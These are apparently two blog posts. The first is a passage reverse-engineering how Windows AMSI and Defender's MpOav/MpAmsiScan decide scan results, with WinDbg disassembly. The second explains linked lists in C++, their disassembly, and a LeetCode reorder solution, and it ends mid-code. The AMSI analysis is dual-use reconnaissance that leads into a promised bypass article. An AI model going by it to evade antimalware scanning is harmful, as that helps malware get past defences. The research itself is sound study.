if it is not, it jumps to label result_valid. else, it sets eax to 0x80070057 and return. In the result_valid label, it sets *result to AMSI_RESULT_CLEAN (0x0). So it looks like the function is clearing the *result to not detected state. Which means we can expect value of result to change.

It also checks if provider is null. If not, it sets value of it to null and continue execution from LAB_7ff94550565c. else, it continues the execution from the same location but without setting *provider to null.

LAB_7ff94550565c does the same thing as AmsiScanBuffer did at the block 0x7ffxxxxx335d. However instead of calling WPP_SF_qqDqq it calls WPP_SF_q. Also note that above snippet sets rdx to either address of [WPP_GLOBAL_CONTROL] or 0x1e.

LAB_7ff94550568d looks interesting.

First it calls rand() function. In case you dont know, it’s pretty common C library function and it generates a psuedo random number and return it. In the next line, it stores a member of CAmsiAntimalware class at offset 0x1c0 in r13 register. Then there are some multipications around the generated value value.

ghidra being ghidra, has renamed registers with the variable names (this is good if we are doing x86 reversing becuase most of calling conventions pass parameters through stack, However, in our case, since parameters are passed through registers, renaming those can cause confusion), So to make it clear, we’ll use listing view.

It assigns the return value from rand() to ecx register and loads eax with 0x51eb851f. then it multiplies random value stored in ecx with the value loaded in eax. Note that this instruction is capable of changing the value at edx register.

Then there’s a shift right instruction, which shifts 5 bits from edx register. then it multiplies shifted edx with 0x64 and stores the value in eax.

sub instruction substracts eax, by ecx. what this whole thing does is similar to below expression

rand() % 0x64;

value of ecx is then stored in a local variable loc_rand and function checks if r13, which holds the value of this->0x1c0 is 0/null. If yes, it jumps to LAB_7ff9455058c4. else, it continues exection from next address.

Now we got two control paths to follow. but first, I’m not gonna take the jump.

Control flow path 1

0x7ffxxxxx56bb, address of this->0x40 gets loaded into r14, which then gets stored in a local variable. Next instruction loads this->0xc0 into r12 register.

Then there’s an unconditional jump and this one jumps directly into a loop. so Im gonna save that part for a debugging session and continue with the other control flow path.

Control flow path 2

LAB_7ff9455058c4 starts with a comparison of r13(this->0x1c0 but as a local variable) with this->0x1c0. The comparison checks if r13 is less than this->0x1c0. if it is, control flow is directed to address 0x7ffxxxxx58cd. else, control flow is directed to label LAB_7ff9455058f7.

First instruction at 0x7ffxxxxx58cd sets r14 to zero (rbx is xored by itself at the begining of the function). Next two instructions checks if r12 is null.

if not, value at address r12 is set to [RSI + r13*0x8 + 0x40]. Then it checks if rcx is null. If we assume the jump to LAB_7ff9455058c4 taken from 0x7ffxxxxx56b5, then rcx would be the remainder of rand() % 0x64 thing. if rcx is null, jump is taken to label LAB_7ff9455058fd. else, it loads value at (*(rcx) + 0x8) to rax and calls it through _guard_dispatch_icall.

if r12 is null, jump is also taken to label LAB_7ff9455058fd.

on the other hand, LAB_7ff9455058f7 also jumps to LAB_7ff9455058fd after moving 0x1 into [rdi]. We already know that rdi is pointing to AMSI_RESULT enum. Constant 1 means AMSI_RESULT_NOT_DETECTED.

this simply checks if this->0x1c0 is null, if it is, it jumps to label LAB_7ff94550590e else, it continues exection from address 0x7ffxxxxx5906.

block starting at 0x7ffxxxxx5906 basically checks if R14 is null. it sets bl if previous comparison has caused sign flag to be 1. The operation may look like this in pseudocode.

    bl = (r14 < 0) + 1;

as you can see in the above control flow graph, code is finally directed towards LAB_7ff94550590e. What this snippet does is, call CAmsiAntimalware::GenerateEtwEvent method. it passes this and amsiStream and bl through rcx, rdx and r9 registers as first three arguments. fourth and the last one is passed through r9 and this is basically the AMSI_RESULT.

Now Im going to find where AMSI_RESULT is being modified. We already know rdi is a pointer to the enum.

In the above snippet, rdi (result) is assigned to value of eax. if we go up in the control flow, we can see eax is assigned with local_108.

Now we know some interesting places to place breakpoints and analyze, it is time to get into a windbg session.

First, Im gonna place a break point at address at place where provider is checked.

0:018> bp 0x7ffxxxxx5654
0.018> g

[...]

0.018> r r9
r9=0000000000000000

As it is clear from the above snippet, r9 register which holds a pointer to a pointer of IAntimalwareProvider class is set to zero. We saw this earlier in AmsiScanBuffer function.

Even if some value is passed down through this register, CAmsiAntimalware::Scan will set it to zero.

the next important piece for us is where this is being accessed.

above diagram shows exection has been stopped just after the instruction where function accessess this->0x1c0.

And the value at that address is set to 0x1. This gives us a hint that this member might be numerical value rather than a pointer.

A little below that, we can the random number generated by rand() being stored in ecx register and that value is 0x2ea6.

Since we already know what this snippet does, we can perform the calculation by ourself.

>>> hex(0x2ea6 % 0x64)
'0x2a'

Above diagram conludes that.

Above diagram shows where the function retreives address of this->0x40 into r14 register.

When this->0x40 is printed, it also looks like an address that pointed at heap.

Value at *this->0x40 looks like a function pointer and when disasseble that address, windbg prints disassembly of MpOav!DllRegisterServer (another dll ? we’ll see)but disassembly starts from the middle of the function. This might not be a function pointer after all.

here is another place where a member of CAmsiAntimalware class has been referenced. this time as we’ve discussed when doing static analysis, stores address this->0xc0.

It doesnt provide us with imformation about type of data even if we take a look at the data at that address,

Control flow path 1 continued

Now we are at the instruction in disassembly where that loop begins.

00007fffae8356d2 488d4c2448           lea     rcx, [rsp+48h]
00007fffae8356d7 895c2440             mov     dword ptr [rsp+40h], ebx
00007fffae8356db 48895c2448           mov     qword ptr [rsp+48h], rbx
00007fffae8356e0 ff15f2680000         call    qword ptr [amsi!_imp_GetSystemTimePreciseAsFileTime (00007fff`ae83bfd8)]

We see that in the above image, first instruction loads address of rsp+0x48 into rcx register and calls GetSystemTimePreciseAsFileTime, which is used to retrieve the current system date and time with the highest possible level of precision in UTC format.

before the call instruction it also initialize rsp+0x40 and rsp+0x48 with 0x0.

Then value at address r14 gets stored in rcx register. if you remember, r14 register stores &this->0x40 so rcx would be value of this->0x40.

Then can see some manipulations around that value.

mov rax, qword ptr [rcx] stores value at *this->0x40 in rax register. Next instruction takes 0x18 th offset of it and stores it back in rax register. Then that address is called using a gaurd_dispatch_icall_fptr.

With that information it is clear that this->0x40 is a pointer to an object of an unknown class. rcx now points to that object and rax holds one of function pointers in the object’s vftable. Well my guess is that this is the windows defender’s AMSI COM interface.

The first argument passed to the function is this->0x40. Second, third and fourth are passed through rdx and r8 registers. we can see that in the
disassembly rdx being set to rsp+0x70 (amsiBuffer) and r8 being initialized to the address of rsp +0x40 (who’s value is 0).

Weird thing is, the function is jumping into the middle of a function.

Let’s try following it.

Well this makes it bit clear. First of all we not jumping into the middle of a function, See that ret instruction up there? What this tells us is, we jumped into a function but it is not labelled correctly.

However if you try to goto this address from a disassembler, it will fail. Indicating that this a function from another dll.

here’s the memory map.

See? It seems like this dll is the COM dll that implements IAmsiAntimalware interface for windows defender.

To confirm that, let’s check the registry.

// registry

Now it is confirmed, let’s go through this function.

MpOav!DllRegisterServer+0x1060:
00007fffae7b37f0 48895c2408      mov     qword ptr [rsp+8],rbx
00007fffae7b37f5 48896c2410      mov     qword ptr [rsp+10h],rbp
00007fffae7b37fa 4889742420      mov     qword ptr [rsp+20h],rsi
00007fffae7b37ff 57              push    rdi
00007fffae7b3800 4156            push    r14
00007fffae7b3802 4157            push    r15
00007fffae7b3804 4883ec20        sub     rsp,20h
00007fffae7b3808 4d8bf0          mov     r14,r8
00007fffae7b380b 4c8bfa          mov     r15,rdx
00007fffae7b380e 488bf1          mov     rsi,rcx
00007fffae7b3811 4d85c0          test    r8,r8
00007fffae7b3814 750a            jne     MpOav!DllRegisterServer+0x1090 (00007fffae7b3820) 

MpOav!DllRegisterServer+0x1086:
00007fffae7b3816 b857000780      mov     eax,80070057h
00007fffae7b381b e96e010000      jmp     MpOav!DllRegisterServer+0x11fe (00007fffae7b398e)

First it does some work on the stack frame and moves 0x80070057 to rax register if third parameter is null (pointer to a stack variable of CAmsiAntimalware::Scan method), And we know this is E_INVALIDARG. And then function jumps to the epilogue. So this is basically a small sanity check.

00007fffae7b3820 41c70001000000 mov     dword ptr [r8], 1 ds:000000931c9ce770=00000000
00007fffae7b3827 80b9c800000000 cmp     byte ptr [rcx+0C8h], 0 ds:00000250a33025d8=00

then it moves 1 or AMSI_RESULT_NOT_DETECTED into third parameter and checks if first parameter (rcx) + 200 is 0. We know that first parameter (rcx) passed down to this function is CAmsiAntimalware->0x40. (yes doesnt make much sense.)

In our case, comparison turns out to be true.

A little below that, there’s a call to another fuction from this dll.

MpOav!DllRegisterServer+0x10d5:
00007fffae7b3865 488d6970         lea     rbp, [rcx+70h]
00007fffae7b3869 488bcd           mov     rcx, rbp
00007fffae7b386c ff15f6120300     call    qword ptr [MpOav!DllRegisterServer+0x323d8 (00007fffae7e4b68)]

it seems to take only one argument and it is &rcx+0x70.

if we step into it, windbg indentifies function as RtlEnterCriticalSection from ntdll. According to msdn, EnterCriticalState function waits for ownership of the specified critical section object. The function returns when the calling thread is granted ownership. function accepts a single parameter and it is of LPCRITICAL_SECTION .

In this case, critical section that this function waits for is rcx+0x70.

next few instructions compare rsi+0x98 with 0 (both rsi and rcx pointed to same address but since rcx now points to rcx+0x70, rsi is used). if comparison fails, it jumps to another location disassembly where LeaveCriticalState is being called.

as shown in the above diagram, function loads rbp, which points to the critical section (rsi->0x70) into rcx. Then LeaveCriticalState function is called.

then two local variables, rsp+0x54 and rsp+0x50, get initialized to 0x0 and 0x1, following a mov instruction which loads a global variable into rcx. then it does a comparison of rcx+0x60 with 0.

In our case, comparision fails and for that reason, jump will be taken.

MpOav!DllRegisterServer+0x1198:
00007fffae7b3928 488b4138         mov     rax, qword ptr [rcx+38h] ds:00000250a357c158=00000250a356b1f0
00007fffae7b392c 4c8d442450       lea     r8, [rsp+50h]
00007fffae7b3931 498bd7           mov     rdx, r15
00007fffae7b3934 488b4948         mov     rcx, qword ptr [rcx+48h]

here we can see another call.

rcx is set to [rcx+0x48] and rdx is loaded with amsiBuffer meanwhile r8, third argument is loaded with address rsp+0x50.

as we can see in the above diagram, this call is to MPCLIENT!MpAmsiScan function. This is basically a function exported by windows defender’s MPCLIENT.dll. So this means we have reached our destination.

Let’s step over this function and inspect the return value since it is out of scope of this article to reverse engineer windows defender internals.

According the above diagram, the return value we get is 0x0. And there’s no way to determine whether this is a indication of detection or not because windows documentation does not provide imformation about MpAmsiScan

Therefore we have to try some tricky methods to identify it.

First, im going to continue the exection.

as expected the result is,

Then we can place a breakpoint at the address where MpAmsiScan return and send some non-malicous input.

Weirdly enough, return value is same. So this function must be using an output parameter to pass the result of the scan, just like AmsiScanBuffer.

Can you remember that the third parameter to MpAmsiScan is a pointer to a local variable? Just in case, keep it’s address in mind.

Somewhere down below, before the program generates an event saying safetykatz is malicious, return value or output parameter of MpAmsiScan must be accessed in order determine whether it’s detected by windows defender or not.

Back to where we left off,

return value of MpAmsiScan is stored in edi register and function compares it with 0 after moving some value to rcx register.

00007fffae7b3945 8bf8             mov     edi, eax
00007fffae7b3947 488b0d32f90300   mov     rcx, qword ptr [MpOav!DllRegisterServer+0x40af0 (00007fffae7f3280)]

MpOav!DllRegisterServer+0x11be:
00007fffae7b394e 85ff             test    edi, edi
00007fffae7b3950 7925             jns     MpOav!DllRegisterServer+0x11e7 (00007fffae7b3977) [br=1]

if return value (edi) is greater than or equal to zero,

MpOav!DllRegisterServer+0x11e7:
00007fffae7b3977 837c245401       cmp     dword ptr [rsp+54h], 1
00007fffae7b397c 0f94c0           sete    al
00007fffae7b397f 8886c8000000     mov     byte ptr [rsi+0C8h], al
00007fffae7b3985 8b442450         mov     eax, dword ptr [rsp+50h]
00007fff`ae7b3989 418906           mov     dword ptr [r14], eax

it sets value of third parameter (pointed by r14) to 1 and simply returns. Also note that return value is set to edi.

else if return value of MpAmsiScan (edi) is less than 0,

MpOav!DllRegisterServer+0x11c2:
00007fffae7b3952 483bcb          cmp     rcx,rbx
00007fffae7b3955 7435            je      MpOav!DllRegisterServer+0x11fc (00007fffae7b398c)

MpOav!DllRegisterServer+0x11c7:
00007fffae7b3957 f6411c01        test    byte ptr [rcx+1Ch],1
00007fffae7b395b 742f            je      MpOav!DllRegisterServer+0x11fc (00007fffae7b398c)

MpOav!DllRegisterServer+0x11cd:
00007fffae7b395d ba11000000      mov     edx,11h
00007fffae7b3962 448bcf          mov     r9d,edi
00007fffae7b3965 4c8d050c700300  lea     r8,[MpOav!DllRegisterServer+0x381e8 (00007fffae7ea978)]
00007fffae7b396c 488b4910        mov     rcx,qword ptr [rcx+10h]
00007fffae7b3970 e803f2ffff      call    MpOav!DllRegisterServer+0x3e8 (00007fffae7b2b78)
00007fffae7b3975 eb15            jmp     MpOav!DllRegisterServer+0x11fc (00007fff`ae7b398c)

it checks validity of some data and calls a function and then returns after setting return value to that of MpAmsiScan stored in edi register, just like the previous one.

00007fffae7b398c 8bc7             mov     eax, edi
00007fffae7b398e 488b5c2440       mov     rbx, qword ptr [rsp+40h]
00007fffae7b3993 488b6c2448       mov     rbp, qword ptr [rsp+48h]
00007fffae7b3998 488b742458       mov     rsi, qword ptr [rsp+58h]
00007fffae7b399d 4883c420         add     rsp, 20h
00007fffae7b39a1 415f             pop     r15
00007fffae7b39a3 415e             pop     r14
00007fffae7b39a5 5f               pop     rdi
00007fff`ae7b39a6 c3               ret

Because the return value we got from MpAmsiScan is 0x0, execution path will be the first one we’ve discussed above.

There is something interesting that we havent discussed about that control flow path. There is a comparison of rsp+0x54 and 1. if that comparison is able to set zero flag, next instruction sets al register to 1.

in our case, rsp+0x54 is not equal to 1.

0:018> dd @rsp+0x54 L1
00000015`8864e564  00000000

which means, al wont be set to 1. If you can remember, rsp+0x54 is only accessed once, just after the call to LeaveCriticalState and that that is the only instruction that sets rsp+0x54 to 0x0. My guess is that this checks if function has entered the LeaveCriticalSection block. It then sets [rsi+0C8h] (rsi == first parameter) to the value of al. Note that rsi+0xc8 should be set to zero in order for this function to be sucessful. We discussed rest of this block earlier.

after the function returns, we’ll end up back at CAmsiAntimalware::Scan. Good news is, we dont need to read every instruction since we already know what we are looking for.

Above image shows how the call looks in decompiled pseudo code. return value of the callee is stored in local variable uVar2. However, we know this is not accurate because caller need to pass three args to the callee (we see none). That’s not important to us though.

Here, the if confition only evaluate true when loc_rand() is equal to zero and a global variable is less than 5. loc_rand is basically the local variable where the random number was stored. Therefore this block is not going to execute.

Above if condition checks if return value (stored in r14) is zero. In our case it is. we know that the third argument passed to the collee is the address of rsp+0x40 and was passed through r8.

below image shows disassembly of the above snippet

amsi!CAmsiAntimalware::Scan+0x1ed:
00007fffae8357ed 4585f6          test    r14d,r14d
00007fffae8357f0 757f            jne     amsi!CAmsiAntimalware::Scan+0x271 (00007fffae835871)

amsi!CAmsiAntimalware::Scan+0x1f2:
00007fffae8357f2 448b07          mov     r8d,dword ptr [rdi]
00007fffae8357f5 8b442440        mov     eax,dword ptr [rsp+40h]
00007fffae8357f9 443bc0          cmp     r8d,eax
00007fffae8357fc 7f2d            jg      amsi!CAmsiAntimalware::Scan+0x22b (00007fffae83582b)

As shown above, mov r8d, dword ptr[rdi] moves value at address stored in rdi into r8 register. rdi stores the address of AMSI_RESULT enum passed down to CAmsiAntimalware::Scan method. it then moves rsp+0x40, output paramater we discussed earlier into eax register.

comparison instruction and jump instruction checks if value in r8 (result) is greater than that of in eax (output parameter). jump wont be taken and execution will directed to the next mov instruction.

This is basically checking if current scan’s result is greater than that of previous one.

amsi!CAmsiAntimalware::Scan+0x1fe:
00007fffae8357fe 8907            mov     dword ptr [rdi],eax
00007fffae835800 4d8bef          mov     r13,r15
00007fffae835803 488b0df6b70000  mov     rcx,qword ptr [amsi!WPP_GLOBAL_Control (00007fffae841000)]
00007fffae83580a 488d15efb70000  lea     rdx,[amsi!WPP_GLOBAL_Control (00007fffae841000)]
00007fffae835811 483bca          cmp     rcx,rdx
00007fffae835814 7451            je      amsi!CAmsiAntimalware::Scan+0x267 (00007fffae835867)

amsi!CAmsiAntimalware::Scan+0x216:
00007fffae835816 f6411c04        test    byte ptr [rcx+1Ch],4
00007fffae83581a 744b            je      amsi!CAmsiAntimalware::Scan+0x267 (00007fffae835867)

amsi!CAmsiAntimalware::Scan+0x21c:
00007fffae83581c 4c894c2430      mov     qword ptr [rsp+30h],r9
00007fffae835821 418d561f        lea     edx,[r14+1Fh]
00007fffae835825 89442428        mov     dword ptr [rsp+28h],eax
00007fffae835829 eb28            jmp     amsi!CAmsiAntimalware::Scan+0x253 (00007fff`ae835853)

In the above snippet it loads eax into [rdi], and value of r15 into r13 and compare some global variables related to WPP.

According to the decompiled snippet, this checks some global variables related to WPP tracer and if checks are valid, it jumps to a location in disassembly after setting rdx register to the address r14 + 1f. Well this has nothing to do with addresses eventhough the instruction is lea. r14 is 0x0. therefore what this does is, it loads 0x1f into rdx register.

However, if we step through each instruction, cmp rcx, rdx will evaluate to 0x0 and the jump will be taken.

amsi!CAmsiAntimalware::Scan+0x267:
00007fffae835867 813f00800000    cmp     dword ptr [rdi],8000h
00007fffae83586d 7d50            jge     amsi!CAmsiAntimalware::Scan+0x2bf (00007fffae8358bf) 

amsi!CAmsiAntimalware::Scan+0x26f:
00007fffae83586f eb34            jmp     amsi!CAmsiAntimalware::Scan+0x2a5 (00007fff`ae8358a5)

in the above snippet, dword value at address stored in rdi is compared to hex 0x8000, decimal 32768. Aand this is exactly the same value msdn specifies in their documentation for AMSI_RESULT enum. quoting msdn,

    'Any return result equal to or larger than 32768 is considered malware, and the content
    should be blocked. An app should use AmsiResultIsMalware to determine if this is the case.'

next instruction is a jge and it essentially takes the jump if dword at address stored in rdi (AMSI_RESULT) is greater than or equal to 0x8000. if it is, it breaks from the loop.

In our case, value at address stored in rdi is less than 0x8000 so the jump won’t be taken. Instead control flow will be redirected to

amsi!CAmsiAntimalware::Scan+0x2a5:
00007fffae8358a5 488344246008    add     qword ptr [rsp+60h],8
00007fffae8358ab 49ffc7          inc     r15
00007fffae8358ae 4983c410        add     r12,10h
00007fffae8358b2 4c3bbec0010000  cmp     r15,qword ptr [rsi+1C0h]
00007fffae8358b9 0f820efeffff    jb      amsi!CAmsiAntimalware::Scan+0xcd (00007fffae8356cd)

r15 is incremented by 1 and it is then compared to this->0x1c0, whose value is 1. if r15 is below that value, it will jump to the address where the loop begins.

Possibly, the loop is going through every registered anti-malware vendor’s COM interface. Since I dont have any anti malware services installed in the VM, its going to loop only once. This also uncovers some details about CAmsiAntimalware class members. The loop terminates after loop iterator veriable being compared to this->0x1c0. Therefore this->0x1c0 is the value that indicates number of registered anti malware services or AMSI providers.

Now the question is, we just executed a malicous program and it just got flagged as AMSI_RESULT_NOT_DETECTED. But we still see powershell produces that red ugly output saying that it detected a malicous program.

And suprisingly, there’s no call to AmsiResultIsMalware.

00007fffae8358c4 4c3baec0010000  cmp     r13,qword ptr [rsi+1C0h]
00007fffae8358cb 732a            jae     amsi!CAmsiAntimalware::Scan+0x2f7 (00007fffae8358f7) 

amsi!CAmsiAntimalware::Scan+0x2cd:
00007fffae8358cd 448bf3          mov     r14d,ebx
00007fffae8358d0 4d85e4          test    r12,r12
00007fffae8358d3 7428            je      amsi!CAmsiAntimalware::Scan+0x2fd (00007fff`ae8358fd)

First if condition checks if r13 register is less than the number of providers (this->0x1c0). We saw that r15, which acts as the counter loaded into r13 previously. What this is checking is that if anything malicous detected before going through all the providers.

Now it is time to conclude our assumptions on AmsiInitialize.

AmsiInitialize

The End

So yeah that’s it for now… we explored AMSI in-depth in this article. In the next one, We will go through some common AMSI bypass techniques.

#Spread Anarchy!

Reverse engineering Linkeds lists

Sun, 03 Oct 2021 00:49:28 +0000

Oh hi. Personally, I’m not a big fan of competitive programming. Anyhow, I wanted to test my DSA skills so i started doing leetcode a week(or two ig)ago. And I spent an entire day solving some of those challenges. Eventually I came cross a medium level challege, named Reorder List. problem is pretty simple, you are given a head node of a linked list, what you have to do is kinda shuffle nodes around.

And in this article, I’m hoping to cover everything from what is a linked list, how they are implemented in assembly to solving and reversing the solution of the above problem.

What is it? and Implementation

A linked list is a data structure. unlike an array where memory is organized linearly, nodes of linked list is scrattered around memory. Each of these nodes contains a pointer to the next node and thats how those scrattered nodes are located.

Lets take a linked list which stores integers as an example

Each node must contain space to store the integer and the pointer to next node. So, a connection between nodes in memory may look like this

  0x1000                     0xabcd
  -----------------          -----------------
  |      |        |          |      |        |
  |  1   | 0xabcd | -------> |  3   | 0xdead | -------> somewhere who knows
  |      |        |          |      |        |
  -----------------          -----------------

Lets see what this looks like in code.

   class ListNode {
      public:
         int value;
         ListNode *next;
   };

There’s another important part of linked lists. which is the head/tail pointers. Head and tail pointers are used to track down head and tail of the linked list. which of those two is used is totally depend on the abstract data type. For example, linked list implementation of a stack may look like this

   class LinkedList {
      ListNode *head;
      int count;
   }

with that, lets implement a stack data structure using linked lists.

node

   class ListNode {
           int ln_value;
           ListNode *ln_next;
       public:
           ListNode(int value): ln_value(value), ln_next(nullptr) {}
           inline int GetValue(void) const { return ln_value; }
           inline ListNode *GetNext(void) const { return ln_next; }
           inline void SetValue(int value) { ln_value = value; }
           inline void SetNext(ListNode *next) { ln_next = next; }
   };

linked list

   class LinkedList {
           ListNode *l_head;
           int l_item_count;
       public:
           LinkedList():l_head(nullptr), l_item_count(0) {}
           inline ListNode *GetHead() const { return l_head; }

           void Push(int value)
           {
               // however i prefer the make_shared way of doing this
               ListNode *node = new ListNode(value);
               if(l_head == nullptr) { l_head = node; }
               else {
                   node->SetNext(l_head);
                   l_head = node;
               }
               l_item_count++;
           }
           int Pop(void) 
           {
               if(l_head == nullptr) return -1;
               ListNode *node = l_head;
               l_head = l_head->GetNext();
               int value = node->GetValue();
               delete node;
               l_item_count--;
               return value;
           }
   };

In the above implementation, we can see that the Push takes and int as an input. Then creates a node and add that node to our linked list. The head will be pointing to the lastly added node.

Then the Pop method returns an int by removing the node at the head.

So, now we know what a linked list is. Let’s look at the disassembly of this before approaching the above problem.

here’s a main function.

   int main(void)
   {
       LinkedList li;
       for (int i = 0; i < 5; i++){
           li.Push(i);
       }
       int c = li.Pop();
       while(c != -1) {
           printf("%d\n", c);
           c = li.Pop();
       }
   }

Implementation in disassembly

So, to disassemble this snippet, Im gonna use radare since im on my linux machine rn. I ran the initial analysis, seeked to main function, and switched to the graph view.

here, we can see that main function creates the stack frame and allocates space for local variables including space for our class LinkedList. Then we can see that it loads some stack address to rax register, moves it into rdi, and then call contructor for LinkedList. From that, we can assume that address loaded into rax and then into rdi as this.

then we can see that it sets var_28 to 0. this must be the snippet where we set i to zero in our first for loop.

then we can see var_28 is compared to 4, and if it is less or equal to 4, we are going to take the jump. this looks like the look termination part. then, next blob basically put i into edx and this into, rax, then we can see both of them are passed as arguements to the method Push().

Looks familiar right? of course we wrote the damn thing. However, if you are not really into C++, this this thing and methods might be not be familiar to you. In C++, a method is basically a function that belongs to an object/object. In this case, Push methods belongs to LinkedList class. And when calling a method, In OOP, we have to pass the pointer to an object of that class as the first arguement. this pointer is called this, but you cant see this in source files because that’s some sorcery done by the compiler. Aaand in _cdecl calling convention uses rdi register as the first arguement. Now back to the disassembly.

main function then increments i by 1, and then continue to loop until i > 4. And when that happens main function breaks out of the loop and get into the next snippet at address 0x11b0.

Here we can see the same thing but now it calls Pop() method. Anyway, that 0xffffffff? thats -1. this time we are iterating until c becomes -1. Aaa yes, it also calls printf with c as arguement.

The rest of this main function is not useful to us. So lets analyze the push method :)

Pushing and Poping

there’s nothing magic here, it creates a stack frame and copy the arguements into its stack. then it passes 0x10 (16) to edi register and calls new. new is an operator in C++ for allocating memory. it accepts 1 arguement, which is the amount of memory we want to allocate. So, here we allcate 16 bytes :).

then we see it copies rax to rbx and esi (which holds second arguement, the value we passed to Push) to eax. They are then passed to ListNode constructor. Next few lines are kinda confusing. First var_28 is the this pointer and we load it to rax. In the next line, we get the value at rax (this) to, well, rax. And that value is the first member of the LinkedList object, which is, as we know from the source, l_head.

then it check whether it is zero or not. And if l_head is not 0, we jump to 0x12d5. Before we get into that stub, lets analyze the other one.

If head equals to 0, that means the linked list is empty. therefore, since this is the first insertion, we have to set l_head to point to newly allocated ListNode. In the blob, we can see the same thing. we can see that in the next two lines that rax is set to var_28(this) and rdx is set to var_18 (ListNode we just allocated). In the next line, value at rax register, l_head is set to the rdx, which is the new node we allocated. :)

So if head is not equal to 0, which means that head is empty and this is not the first value that has been inserted to the list. Therefore what we have to do is, set new node’s next node to l_head and set l_head point to newly allocated ListNode :). In the stub, we can see the same thing.

rax and rdx registers are loaded with var_18 and [var_28]. In the next few lines, rdi and rsi are set to the same values and passed as args to method node->SetNext(). Now SeNext method belongs to ListNode class and its this pointer is a ListNode pointer. here, in this case, rdi is set to var_18 and rsi, second arguement is set to l_head. In the next few lines we can the same code sequence that we saw ealier. It sets l_head to this new node :).

then it increases l_item_count and returns in the next few lines.

So, that is it for Pushing :) Now lets see how Pop method looks like in assembly.

Well a stack frame… and then Pop method sets rdi to this, and check if this->l_head is equal to null. if it is null, it moves -1 to eax (0x1316), and then jump to function epigolue and simply returns.

On the other hand if head is not null, we save l_head in var_8 (0x13d1 - 0x1324), then we load l_head to rdi and call l_head->GetNext() method to get the next node (0x1328 - 0x1332). In the next few lines, return value (rax) of the GetNext method is set to l_head. it can be decompiled like l_head = l_head->GetNext(). Then it gets the node it previsouly saved in var_8 and calls GetValue(). It also saves the return value in the stack (in var_c). then it check if the saved node is null (0x134d - 0x1354), if it it is we jump to below snippet.

What this stub does is, loads [var_18] + 8 to rax register, substract 1 from rax, tore it in edx, set edx to something like [var_18] + 8 and returns the value it stored at var_c from GetValue() call. here, [var_18] is the this pointer and [var_18] + 8 means the second member of the ListNode class. which is l_item_count. so as a summery we are decresing that value.

if the saved node is not null, then it jumps to below stub

here it deletes (frees) var_8, the copy of the head node.

Now, from the above explaination, i assume that low level constructs of linked lists are clear to the reader.

Traversal

Linked list traversal is pretty simple and there is no particular method to do this. one can use recursion. But here, im gonna write a traversal method using a for loop.

    ListNode *LinkedList::GetNodeByValue(int value) const
    {
        ListNode *node = l_head;
        while(node){
            if (node->GetValue() == value){
                return node;
            }
            node = node->GetNext();
        }
        return nullptr;
    }

here, I have created another method, to call this i have modified the main function like shown below.

    int main(void)
    {
        LinkedList li;
        for (int i = 0; i < 5; i++){
            li.Push(i);
        }
        auto node = li.GetNodeByValue(2);
        printf("%d\n", node->GetValue());
    }

Now let’s take a look at the disassembly and try to understanding whats going on in the new method :3

like any other function, this one sets up a stack frame and alloacate enough space for locals. And like any other method we have encountered so far, this one too saves rdi, which is this, in a local variable (0x1162). It also stores the arg we passed in the local var_1c. var_8 is loaded with l_head (0x1169 - 0x1170).

then that stub jumps into 0x11a2. there, it compares var_8 with 0. if it is 0, the jump is taken to 0x11a9, else it continues execution on 0x1176.

in the stub starts at address 0x11a9, we can see that var_8 is loaded into rdi and then passed into var_8->GetValue() method and compares return valeue in var_1c. next we can see a sete instruction, which sets al to 1 if zero flag is set (if var_1c == var_8->GetValue()). then it compares al register with 0 (0x1188). if test instruction sets 0 flag, which means, al == 0 and therefore var_1c != var_8->GetValue() and program takes the jump to 0x1192

otherwise, if result of the test instruction does not set zero flag, which means, var_1c == var_8->GetValue(), program continues execution from 0x118c.

in 0x118c, rax is loaded with a pointer to the current node, and then it jumps to 0x11ae and leaves. in 0x1192, we call var_8->GetNext() and jump back to 0x11a2 to continue the loop.

And that is it for the traversal part.

Now let’s solve the above leetcode problem.

Solution to the problem

As previsouly mentioned, the problem is about mixing up nodes in the given linked list. for example,

if given a linked list like this,

    [1] -> [2] -> [3] -> [4] -> [5]

you have to generate this

    [1] -> [5] -> [2] -> [4] -> [3]

Well it is bit hard at first if you think enough, its easy. Think about it like, this,

First node should be the 1st node, second node shoud be the n-1 th node, third node should be the 2nd node and fourth node should be n-2 th node and so on. And from that it is clear that we should use 2 pointers, one pointing to the first node and another one pointing to the last node. Then by interating each one of them from both first start and end, we can get the disired output.

consider the below example

1st iteration

    [1] -> [2] -> [3] -> [4] -> [5]

     ^                           ^
     |                           |
     |                           |
    1st pointer             2nd pointer

2nd iteration

    [1] -> [2] -> [3] -> [4] -> [5]

            ^             ^
            |             |
            |             |

           1st           2nd 
         pointer        pointer

3rd iteration

    [1] -> [2] -> [3] -> [4] -> [5]

                   ^
                   |
                   |
                1st & 2nd
                 pointers

Now, the thing is, what will happen after 3rd iteration?

well, if you continue the iteration, it will go through the nodes that we already used. So to solve this problem, we can device the linekd list into two parts. like shown below.

    [1] -> [2] -> [3] -> NULL  [4] -> [5]

So how can we do that? how can we seperate the linked list?. The easiest way I can think of is to use pointers, starting with the 1st node, increase 1st pointer by 1 node while iterating the second node by 2 nodes. consider the below example.

1st iteration

    [1] -> [2] -> [3] -> [4] -> [5]

     ^
     |
     |
  1st / 2nd
  pointer

2nd iteration

    [1] -> [2] -> [3] -> [4] -> [5]

            ^      ^
            |      |
            |      |
          1st     2nd
         pointer  pointer

3rd iteration

    [1] -> [2] -> [3] -> [4] -> [5]

                   ^            ^
                   |            |
                   |            |
                 1st           2nd 
                 pointer      pointer

See?, now we can set the next node of the node pointed by 1st node to null.

Eventhough we seperated the list, there is another problem we have to face. Some of you may have already noticed that. There is no way we can reach previous nodes from the second list since each node is pointing to the next node. So we have to reverse the second linekd list too.

Here is what we should do to re-order the linked list.

Seperate the list into two lists.
Reverse the second list
Start iteration from the first node of the fist list and first node of the second list(reversed list)

Here is the implementation.

    void ReorderList(ListNode *head)
    {
        /* seperating the list */
        ListNode *f = head, *l = head;
        while(l != nullptr && l->GetNext() != nullptr){
            f = f->GetNext();
            l = l->GetNext()->GetNext();
        }

        /* saving the first node of second list */
        ListNode *node = f->GetNext();
        f->SetNext(nullptr);

        /* reversing the second list */
        ListNode *prev = nullptr;
        while(node != nullptr) {
            auto nnode = node->GetNext();
            node->SetNext(prev);
            prev = node;
            node = nnode;
        }

        /* re ordering lists */
        ListNode *start = head;
        ListNode *end = prev;
        while (start != nullptr && end != nullptr) {
            auto nnode = start->GetNext();
            start->SetNext(end);
            auto ennode = end->GetNext();
            end->SetNext(nnode);
            start = nnode;
            end = ennode;
        }
    }

main function

    int main(void)
    {
        LinkedList li;
        for (int i = 5; i > 0; i--){
            li.Push(i);
